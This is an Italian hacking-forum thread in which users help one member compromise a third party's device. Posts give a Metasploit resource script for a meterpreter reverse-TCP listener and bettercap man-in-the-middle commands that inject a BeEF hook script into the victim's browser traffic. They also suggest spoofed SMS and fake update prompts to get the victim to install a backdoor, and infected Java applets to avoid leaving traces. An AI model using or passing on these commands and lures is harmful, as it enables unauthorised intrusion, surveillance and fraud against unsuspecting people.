Domanda Concatenare comandi MSF Console

Stato
Discussione chiusa ad ulteriori risposte.

Eoloprox

Utente Emerald
20 Marzo 2016
607
151
51
415
Devo concatenare questi comandi nella shell di msfconsole.....
sapete che il tempo è scarso durante gli assalti :D

Come mettere in listener con questi dati in un click?
  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. set LHOST 192.168.1.14
  4. set LPORT 4445
  5. run
Grazie
 
intendevo dire, come darli in automatico come i file .bat, creando un file con all'interno i sudetti comandi..... sempre sotto MSFconsole
 
intendevo dire, come darli in automatico come i file .bat, creando un file con all'interno i sudetti comandi..... sempre sotto MSFconsole
Non devi essere veloce... Inoltre io server si accorge del attacco solo con "run" con gli altri comandi non si accorge di nulla.
 
grazie della spiegazione, ora mi resta da chiedervi una strategia....
questo carissimo trojan come posso mandarlo per infettare il targhet?
Bettercap? con MITM oppure via mail? Cosa preferisci?
 
grazie della spiegazione, ora mi resta da chiedervi una strategia....
questo carissimo trojan come posso mandarlo per infettare il targhet?
Bettercap? con MITM oppure via mail? Cosa preferisci?
Dove hai contatti con lui? Quali sono i suoi interessi?
 
Devo concatenare questi comandi nella shell di msfconsole.....
sapete che il tempo è scarso durante gli assalti :D

Come mettere in listener con questi dati in un click?
  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. set LHOST 192.168.1.14
  4. set LPORT 4445
  5. run
Grazie
potresti inserire tutti i comandi dentro un file .rc e caricarlo come resource su metasploit console:
Bash:
touch automated_msf.rc
echo 'use exploit/multi/handler' >> automated_msf.rc
echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> automated_msf.rc
echo 'set LPORT 4445' >> automated_msf.rc
echo 'set LHOST 192.168.1.14' >> automated_msf.rc
echo 'run' >> automated_msf.rc
,
poi per eseguirlo fai:
Bash:
msfconsole -r /percorso/automated_msf.rc

oppure se gia' hai aperto msfconsole:

msf > resouce /percorso/automated_msf.rc
 
grazie della spiegazione, ora mi resta da chiedervi una strategia....
questo carissimo trojan come posso mandarlo per infettare il targhet?
Bettercap? con MITM oppure via mail? Cosa preferisci?
Volendo potresti adottare un metodo [se sei connesso alla stessa wifi della vittima] per mandare un falso messaggio di aggiornamento, che quando viene avviato per "aggiornare" il programma, scarica la backdoor
 
grazie della spiegazione, ora mi resta da chiedervi una strategia....
questo carissimo trojan come posso mandarlo per infettare il targhet?
Bettercap? con MITM oppure via mail? Cosa preferisci?
Oppure potresti mandargli un sms spoofato come se fosse la samsung [o il suo gestore] che gli dice di scaricare un programma per aggiornare il sistema [quando invece e' la tua backdoor]
 
che ne dici se potresti dirmi un link oppure meglio, i comandi per inviare via Beetercap il trojan tramite il browser del targhet?
Come scarica il 1 file...thò ecco la sorpresa :D
 
Io ti consiglio di injectare nel suo traffico uno script js malevolo [quello di beef hook framework], cosi' lo esegue appena avvia il browser ed e' anche facile infettarlo senza lasciare tracce consstenti [almeno rispetto ad una backdoor]:

avvii beef hook
Bash:
cd location/of/beef

./beef //si avvia beef

sudo bettercap --proxy-module injectjs --js-url "http://yourlocalip:3000/hook.js"

oppure

sudo bettercap -T IPdellavittima --proxy-module injectjs --js-url "http://yourlocalip:3000/hook.js"
e poi vai sul web panel di beef: da qui appena la vittima esegue il js infetto, si apre la sessione e potrai adottare moltissimi script pre-confezionati pronti all uso:
io ti consiglio di eseguire anche un java applet infetto per poter aumentare il controllo sul device ed utilizzarlo un po' come backdoor su browser.
 
state guardando troppi film
gatto%20sbalordito.2017-04-21-19-41-43.gif
 
Ultima modifica:
figata ora mi metto subito a lavoro..... ho testato il BeEF, ma mi sono trovato meglio sotto il meterpreter,
ora studio meglio il BeEF, poi ti do una risposta.... ciao THX!

Rieccomi, da li non e possibile avviare una sessione meterpreter come detto prima?

BeEF non mi fa fare un azz.... e possibile?
 
Se ti si apre la sessione con beef, poi puoi passare la sessione a msfconsole [quindi meterpreter] attraverso metasploit browser autopwn oppure un redirecting su una pagina con applet java infetto;
Oppure puoi injectare lo script beef nel traffico o sostituire un download con la tua backdoor.
In caso in cui beef non ti apre neanche una sessione [naturalmente devi essere andato sulla pagina infetta prima di dire se funfge o non], allora puoi procedere direttamente attraverso sempre i 2 exploit sopra citati oppure devi provare con metodi leggermente piu' visibili, come far eseguire un file hta, oppure potresti provare ad intgrare beef ad armtage per avere le sue opzioni direttamente da armitage, ma e' piu' complesso.
In ogni caso un link infetto e' la cosa migliore: lascia poche tracce di se' nel pc e spesso [come un applet in java], e' anche multipiattaforma
 
Stato
Discussione chiusa ad ulteriori risposte.